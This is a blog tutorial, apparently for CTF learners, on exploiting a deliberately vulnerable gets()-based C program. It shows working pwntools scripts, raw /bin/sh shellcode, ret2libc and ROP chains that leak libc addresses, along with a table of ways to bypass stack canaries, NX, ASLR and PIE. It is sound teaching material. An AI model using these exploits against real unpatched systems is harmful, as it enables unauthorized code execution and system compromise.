> Stack Buffer Overflows: From Crash to Shell_

Buffer overflows are the grandfather of memory corruption vulnerabilities. Decades old, largely mitigated in modern software — but understanding them is foundational. They appear in CTFs constantly, they still exist in embedded firmware and legacy systems, and every other exploitation technique builds on the concepts here.

This post assumes basic C knowledge and Linux familiarity. We'll go from a vulnerable program to a root shell.

## The stack, briefly

The call stack is a region of memory used to manage function calls. When you call a function, the CPU pushes a stack frame containing:

terminal

High addresses
┌──────────────────────┐
│    caller's data     │
├──────────────────────┤
│   return address     │  ← where execution returns after the function
├──────────────────────┤
│    saved EBP/RBP     │  ← caller's base pointer
├──────────────────────┤
│   local variables    │  ← including buffers
│       ...            │
└──────────────────────┘
Low addresses (stack grows down)

When gets() or strcpy() writes more data than a buffer can hold, it overwrites the saved return address. When the function returns, the CPU jumps to your address instead of the original caller.

## Vulnerable program

terminal

// vuln.c
#include <stdio.h>
#include <string.h>

void vuln() {
    char buf[64];
    gets(buf);  // never use gets() — no bounds checking
    printf("You said: %s\n", buf);
}

int main() {
    vuln();
    return 0;
}

Compile with mitigations disabled (for learning):

terminal

gcc -m32 -fno-stack-protector -z execstack -no-pie -o vuln vuln.c
# -m32: 32-bit for simpler addresses
# -fno-stack-protector: no canary
# -z execstack: stack is executable
# -no-pie: fixed addresses (no ASLR at binary level)

## Step 1: Find the crash

terminal

python3 -c "print('A' * 100)" | ./vuln
# Segmentation fault

Now use a cyclic pattern to find exactly which offset overwrites EIP:

terminal

# Using pwntools
python3 -c "from pwn import *; print(cyclic(200).decode())" | ./vuln
# Segfault

# Find the offset from the crash address
dmesg | tail -1  # shows the faulting address, e.g., 0x6161616c
python3 -c "from pwn import *; print(cyclic_find(0x6161616c))"
# Output: 76  — EIP is overwritten at offset 76

Manually with GDB:

terminal

gdb ./vuln
(gdb) run < <(python3 -c "print('A'*100)")
(gdb) info registers eip
# eip = 0x41414141 (four A's — confirmed control of EIP)

## Step 2: Control EIP

terminal

# exploit.py
from pwn import *

offset = 76
payload = b"A" * offset + b"B" * 4  # B's will overwrite EIP

p = process("./vuln")
p.sendline(payload)
p.interactive()

terminal

python3 exploit.py
# EIP should be 0x42424242 (four B's)

## Step 3: ret2shellcode (NX disabled)

When the stack is executable (-z execstack), we can place shellcode in the buffer and jump to it.

Shellcode for a /bin/sh shell (32-bit Linux):

terminal

from pwn import *

context.arch = 'i386'
context.os = 'linux'

shellcode = asm(shellcraft.sh())
# Or use pre-written shellcode:
# shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

offset = 76

# Find the buffer address in GDB:
# (gdb) break vuln
# (gdb) run
# (gdb) x/32wx $esp  — look for where your input lands
# (gdb) p &buf  — or directly get the local var address
buf_addr = 0xffffd4a0  # the address of buf[] in the stack frame

payload = shellcode
payload += b"A" * (offset - len(shellcode))  # padding
payload += p32(buf_addr)  # overwrite EIP with start of our shellcode

p = process("./vuln")
p.sendline(payload)
p.interactive()

This technique is blocked by NX (non-executable stack). Most modern systems have NX enabled.

## Step 4: ret2libc (NX enabled)

When the stack isn't executable, we can't run shellcode there — but we can call existing executable code. system("/bin/sh") is in libc. All we need is its address and a pointer to the /bin/sh string.

terminal

# Find system() address
gdb ./vuln
(gdb) p system
# $1 = {<text variable, no debug info>} 0xf7e3d200 <system>

# Find "/bin/sh" in libc
(gdb) find &system, +999999, "/bin/sh"
# 0xf7f569e8  <-- address of "/bin/sh" string in libc

Or from the shell:

terminal

ldd ./vuln | grep libc
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system@@"
# Returns offset of system() from libc base

strings -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
# Returns offset of /bin/sh string

Build the payload:

terminal

from pwn import *

offset = 76

# Hardcoded addresses (ASLR disabled: echo 0 > /proc/sys/kernel/randomize_va_space)
system_addr = 0xf7e3d200
exit_addr   = 0xf7e2e1d0   # return addr after system() — use exit() to clean up
binsh_addr  = 0xf7f569e8

# Stack layout after overflow:
# [padding][EIP=system][return_after_system=exit][arg_to_system=/bin/sh]
payload = b"A" * offset
payload += p32(system_addr)
payload += p32(exit_addr)
payload += p32(binsh_addr)

p = process("./vuln")
p.sendline(payload)
p.interactive()

## Step 5: ROP chains (ASLR + NX)

When ASLR randomises libc's base address, we can't hardcode system(). We need to:

>Leak a libc address at runtime (find the real base)
>Calculate the offset to system() and /bin/sh
>Return-orient to call system("/bin/sh")

ROP (Return-Oriented Programming) chains together small code sequences ending in ret ("gadgets") to build arbitrary computation from existing executable code.

terminal

# Find gadgets with ROPgadget
ROPgadget --binary ./vuln --rop

# Or with ropper
ropper -f ./vuln --search "pop eax; ret"

A full ROP chain for 64-bit with ASLR is more involved — uses puts() to leak a libc address, calculates base, then calls system("/bin/sh").

terminal

from pwn import *

elf = ELF("./vuln64")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
rop = ROP(elf)

# Stage 1: leak puts@got to find libc base
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]

stage1 = b"A" * offset
stage1 += p64(pop_rdi)
stage1 += p64(elf.got['puts'])     # arg: address of puts in GOT
stage1 += p64(elf.plt['puts'])     # call puts(puts_got) — leaks libc addr
stage1 += p64(elf.sym['main'])     # return to main for stage 2

p = process("./vuln64")
p.sendline(stage1)

# Parse the leaked address
p.recvuntil(b"You said: \n")
leak = u64(p.recvline()[:6].ljust(8, b'\x00'))
libc.address = leak - libc.sym['puts']
log.info(f"libc base: {libc.address:#x}")

# Stage 2: now call system("/bin/sh")
# (ret gadget for stack alignment on 64-bit)
ret = rop.find_gadget(['ret'])[0]

stage2 = b"A" * offset
stage2 += p64(ret)                       # align stack (required on 64-bit)
stage2 += p64(pop_rdi)
stage2 += p64(next(libc.search(b'/bin/sh\x00')))
stage2 += p64(libc.sym['system'])

p.sendline(stage2)
p.interactive()

## Modern mitigations and what breaks them

Mitigation	What it does	How to bypass
Stack canary	Random value before return address; checked on return	Leak canary via format string, brute force (fork servers), or overwrite only return addr if canary isn't between
NX / DEP	Stack/heap not executable	ret2libc, ROP chains
ASLR	Randomises load addresses	Leak addresses at runtime, brute force (32-bit has limited entropy), heap spraying
PIE	Binary itself is ASLR'd	Leak binary address, then compute all offsets
RELRO (Full)	GOT is read-only	Can't overwrite GOT — must use other write-what-where gadgets
SafeStack	Keeps return addresses in a separate protected stack	Rarely deployed, requires compiler support

Bypassing all of these simultaneously (Full RELRO + Canary + NX + ASLR + PIE) requires multiple vulnerabilities chained together — the typical path is: leak via format string → leak binary/libc base → ROP to one_gadget (a single libc gadget that spawns a shell when constraints are met).

## Essential tools

Tool	Use
pwntools	Python library for exploit development
GDB + pwndbg	Dynamic analysis with memory inspection
ROPgadget / ropper	Find ROP gadgets
checksec	Check binary protections
one_gadget	Find magic gadgets in libc that exec a shell
patchelf	Change a binary's linked libc for local testing

terminal

checksec --file=./vuln
# Output shows: Canary, NX, PIE, RELRO status

Buffer overflows in 2025 are largely a solved problem in new software — but the exploitation techniques they teach are the foundation of every heap exploit, kernel pwn, and browser bug that still exists. If you're on the CTF track, start here.

root@sovietghost:/blog/041-buffer-overflow# ls -la ../

← Back to blog index